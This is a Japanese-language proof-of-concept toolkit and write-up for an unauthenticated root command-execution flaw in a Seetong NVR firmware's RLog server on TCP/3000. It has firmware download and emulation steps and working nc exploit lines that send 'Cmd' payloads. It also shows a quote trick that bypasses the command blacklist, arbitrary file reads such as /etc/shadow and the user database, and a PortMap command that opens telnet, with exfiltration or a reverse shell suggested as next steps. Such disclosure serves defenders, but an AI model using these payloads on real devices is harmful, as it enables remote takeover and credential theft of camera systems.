
CVE-2026-100886 | 認証不要のリモートコード実行ツールキット。
このハーネスは、ファームウェアのlibLOG.soがTCP/3000上でRLogサーバーを起動することを実証します。コマンドディスパッチャの分析と動的テストにより、そのサーバーを介した認証不要のOSコマンド実行が実証されています。
これはqemu-arm上でファームウェア自身のlibLOG.soをロードし、TLog_Init()を呼び出します。すると実際のサーバーが0.0.0.0:3000にバインドし、どこからでも****認証なしで受信接続を受け付けます。
ファームウェアはTCP/3000上で認証不要のRLogコマンドサーバーを公開しています。
コマンドディスパッチャはCmdを登録し、これが攻撃者制御の入力をTLog_CMDに渡します。TLog_CMDは最終的にファームウェアのコマンド実行バックエンドを呼び出します。
したがって:
Unauthenticated TCP connection
↓
RLog command dispatcher
↓
Cmd <attacker-controlled command>
↓
TLog_CMD
↓
mysystem()
↓
/bin/sh
↓
command execution
harness.c: 永続版: サーバーを起動してスリープします(実際の使用にはこちらを使用してください)probe_harness.c: プローブ版: エミュレータ内部からコマンドプローブも試行します(type-byteフレーミング要件を示します)以下のスクリプトがsysroot作成に使用するファームウェアのダウンロードがもう存在しない場合。以下のいずれかから入手できます(nvrを画像検索するだけです、このファームウェアは広く配布されています):
これにはファームウェアv4.6.1.4-build202604241011を使用しました。他のファームウェアバージョンはまだテストされていませんが、fullwardのような下流のドロップシッパーも同様に持っています。
ハーネスと同じディレクトリでこれを実行してください
# Download and extract toolchain
wget https://gitlab.arm.com/api/v4/projects/tooling%2Fgnu-toolchains-for-arm/packages/generic/gnu-toolchain/15.3.rel1/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz
tar -xvf arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz
TC=$(pwd)/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf
# Creating the sysroot
wget http://www.tpsee.com/upload/firmware/update-ts81xxd3x-v4.6.1.4-build202604241011.bin
binwalk -Me update-ts81xxd3x-v4.6.1.4-build202604241011.bin
mkdir -p sysroot
cp -a "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_rootfs.ts81xxd3x.extracted/squashfs-root/lib" sysroot/
cp "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libLOG.so" \
"_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libmysystem.so" sysroot/lib/
$TC -march=armv7-a -mthumb -mfloat-abi=soft -nostdlib -ffreestanding -fno-builtin \
-Wl,--dynamic-linker,/lib/ld-uClibc.so.0 -Wl,-rpath,/lib -Wl,-e,_start -Wl,--export-dynamic \
harness.c -o harness -L sysroot/lib -lc
このハーネスは、libLOG.soがedvrからインポートするシンボルのスタブ実装を提供します
qemu-arm -L sysroot ./harness &
sleep 2
ss -tln | grep 3000
# -> LISTEN 0 5 0.0.0.0:3000 0.0.0.0:* (qemu user-mode forwards the emulated socket to the host)
probe_harness.cからの観測出力(上記スクリプトで使用されているものではありません):
dlopen ok
TLog_Init() -> 0
--- probe port 3000 ---
connect port 3000 OK (x5 meaning every connection accepted)
REPLY: timeout/none (plain-text probes ignored: binary type-byte framing required)
➜ seetong-ts81xxd3x-rce printf 'Cmd cat /etc/os-release > /tmp/rlog_os.txt\r\n' | nc 127.0.0.1 3000
^C%
➜ seetong-ts81xxd3x-rce cat /tmp/rlog_os.txt
NAME="Artix Linux"
PRETTY_NAME="Artix Linux"
ID=artix
BUILD_ID=rolling
ANSI_COLOR="38;2;23;147;209"
HOME_URL="https://artixlinux.org/"
DOCUMENTATION_URL="https://wiki.artixlinux.org/"
SUPPORT_URL="https://forum.artixlinux.org/"
BUG_REPORT_URL="https://bugs.artixlinux.org/"
PRIVACY_POLICY_URL="https://terms.artixlinux.org/docs/privacy-policy/"
LOGO=artixlinux-logo
➜ seetong-ts81xxd3x-rce
このPoCは適切に分離していないため、qemuユーザーモードがホストのファイルシステムを共有していることによりArtix Linuxが表示されます。
AI開示、以下のテキストはAI生成です
LogModuleRegCmd @ 0x8f94)| コマンド | ハンドラ | 効果 |
|---|---|---|
StartDebug, StartLog, SetLogLevel, Help, StartAutoTest | 各種 | ログ/セルフテスト制御 |
GetSystemStatus, GetSystemInfo, GetSystemLog, GetSystemCfg | TLog_Get* | 情報/設定/ログの開示 |
GetSystemFile [abs names] | TLog_GetSystemFile (0x7a94) + TLog_SendFile (0x48f0) | 任意ファイル読み取り (/etc/shadow, /usr/local/etc/user.db, ...) |
GetPrintfFile | TLog_GetPrintfFile | ファイル読み取り |
Cmd [System commands] | TLog_CMD (0x3680) | rootとしてのシェルコマンド実行 |
PortMap on <ip> <port> / PortMap off | fcn.00008b76 | リバースTUNトンネル + ポート23でのtelnetd |
; \r \nで停止)。vi, cd, top, if, killcmd} (strcmp) — 簡単にバイパス可能(cat、sh、クォート)。"%s -b" → sh -c経由で実行。ps -ef | grep "sh -c %s" |grep -v grep、'{print $1}' | xargs kill -9。mysystem() (libmysystem.so) → **/usr/sbin/systemd**へのIPC(偽のsystemd、rootとして/bin/sh経由で実行; 文字列 "[systemd cmd:]%s"、"[systemd ret:]%d")。ブラックリストのデモ(2026-08-04、エミュレートされたサーバー):
Cmd vi > /tmp/bl_vi → dropped (no file created)
Cmd cat /etc/hostname > /tmp/bl_cat → executed (file contains hostname)
Cmd v''i > /tmp/bl_bypass → BLACKLIST BYPASSED (shell sees `vi`, strcmp sees `v''i`)
PortMap on <ip> <port>を解析(3フィールドを期待)。portmap_client_start(ip, port) (0x88b0):
system("lsmod | grep -q '^tun\\b' || insmod /config/modules/4.9.84/tun.ko")/dev/net/tunを開き、インターフェース**tps0**を作成、ifconfig tps0 up/mnt/nand/yun_id.txt、/etc/product_type.txtを読み取りsystem("touch /usr/local/etc/normal_telnet") (0x897e→0x8982)system("killall telnetd") (0x8c1e) と system("telnetd -p 23 &") (0x8c32) を実行。portmap_client_stop (0x8a48) → system("rm -f /usr/local/etc/normal_telnet")、ifconfig tps0 down。portmap_client_get_status、portmap_client_is_running、portmap_client_get_assigned_ip。"usage: PortMap on <ip> <port> | PortMap off\n"、"PortMap on: IP=%s, Port=%d\n"、"PortMap start success! ret:%d"、"PortMap stop success!"。"rm %s/* -rf" (0xad10) — ログディレクトリのクリーンアップ (TLog_DeleteLogFile) で使用。ハーネス(harness.c)はlibLOG.soをdlopenし、そのedvrインポートをスタブし、TLog_Init()を呼び出します:
dlopen ok
TLog_Init() -> 0
ホスト側(qemuユーザーモードのソケットパススルー):
LISTEN 0 5 0.0.0.0:3000 0.0.0.0:* users:(("qemu-arm",pid=...,fd=0))
コマンド実行の証明(プレーンテキスト、認証なし):
$ printf 'Cmd touch /tmp/rlog_pwned\r\n' | nc <target> 3000 # file created
$ printf 'Cmd id > /tmp/rlog_id.txt\r\n' | nc <target> 3000 # id output captured
両方ともエミュレートされたサーバーで検証済み。コマンドはmysystem() → /usr/sbin/systemd → /bin/sh(デバイス上ではroot)経由で実行されます。ソケット上で出力は返されません(ブラインドRCE; 帯域外の持ち出し、例えばCmd cat /usr/local/etc/user.db > /mnt/...やリバースシェルを使用してください)。
影響: 認証されていないネットワーク攻撃者は誰でもrootとしてシェルコマンドを実行し、任意のファイル(平文パスワードDBやパスワードが漏洩するログを含む)を読み取り、telnetをポート23に切り替えることができます。LAN上ではこれで終わりです。インターネットに公開されたユニットでも同様です。